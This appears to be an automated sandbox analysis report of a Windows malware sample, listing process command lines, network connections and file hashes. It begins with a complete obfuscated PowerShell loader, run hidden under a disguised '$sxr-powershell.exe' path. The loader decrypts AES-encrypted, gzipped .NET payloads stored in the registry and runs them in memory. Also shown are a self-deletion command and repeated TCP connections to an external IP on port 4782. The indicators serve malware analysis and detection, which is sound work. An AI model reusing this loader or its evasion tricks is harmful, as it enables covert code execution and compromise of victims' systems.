"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join 
'').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join 
'')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = 
[Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{95d8d05e-daed-48bd-acd6-088194a59e27}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2badb970-0ee3-4b27-a94d-a01e540c4995}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f076ceda-59a0-4b89-b6f7-0bb03581a885}
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5d4c1b37-9138-4495-8ae4-d154870b7857}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{68c18e95-fca2-44cf-bdc9-7416bb512836}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{52e53863-69fb-41a0-9e96-acb5f7e0af93}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{329780d6-c194-4c0a-80de-24e0e2477612}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e3a5a8f2-ba1f-442f-a027-b0df8d9017e5}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{41c108b2-7ae1-4ca1-b47b-dca1fcf112fc}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2b6b2dc1-4e67-4c1e-b3ca-4565b2a132b3}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 5820 -ip 5820
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5820 -s 308
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{9708dcbf-e875-44b8-a5d4-03771b9fcda6}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{675e7367-5393-4afc-a47e-fcf042d536e1}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f2b2f4c5-7a98-48e6-8b8b-acd2b7293109}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 376 -ip 376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 376 -s 456
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{eb4d027d-449b-452c-913f-affa67d6daef}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{1519bb58-08e6-4e31-8d8b-b982de74ff3b}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bc2940b0-c17f-4b9b-a5e6-e8e658f8fdea}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{a5590f11-ab6f-40ee-977a-240faad25fba}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ewlbilj.dmq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4774.tmp.csv
| MD5 | e75427096036e766270102ddad04b3e7 |
| SHA1 | 746ea8d0d1b84a0dd7c250e67f7307348abbbfeb |
| SHA256 | 147fe85a518d534c6d5319bf5ebe20c116f152280aeaddd7bbe764cce38e777b |
| SHA512 | ee1568eac456964a620a4c7a46707c87457606457e80d8e47d6cf453fe22fec25a71a02ec94a7eca9ed2827ad0d97148545a426f4f1b39142440775412a807ba |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4794.tmp.txt
| MD5 | dea8a66faf66ccc405c61edc00bce542 |
| SHA1 | c76606dabf5665081f8a3e98830a1605df08e552 |
| SHA256 | 40c5f0c40e110c031732b494d55a78449e11066eef28537c21f3c48f6f3bead8 |
| SHA512 | 657bebecedad843c723a5e73f9499f978135836a8c32d24ccdf8ae84d37103ca0b32500650068f8cb2758180938e664e6ff77ad598565f7efe12ae5dec6c6917 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FE2.tmp.csv
| MD5 | 2aa06b36e05bfda6ef341bc41bb46b86 |
| SHA1 | 2d15b0ecabbc13db2a6f1bda2457f97f8ceedef2 |
| SHA256 | 4033805b08b1ca41789226649a504b6dd76d9e9578622dd5aa6006ec78d6646b |
| SHA512 | 1d50bdf1f4d06ce8e10f36b05ab9a6f3281da26a2589e6006dad3cb4e4e9eb849e9ba152c65497868fb2f9ebd1e3b214bf9ab1587a3fc87ef0e895b29d71200a |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5002.tmp.txt
| MD5 | cc2e708111bc4491d8f47967d3343bf3 |
| SHA1 | 816ff84dfe8ad7d275842fb0a9080299b5e8890a |
| SHA256 | 099f7186c89c968eb6c3cb635aa913b09f9ec474e664929ff720a20aca584338 |
| SHA512 | e1ab58a51f62c924f2b2ef5210a4191ddb60fc0890b0f55646fb05c5dd6c7908d25790136e86f592e18a7c138659858e5cecb5ecbca7f946b41f341e88951c2e |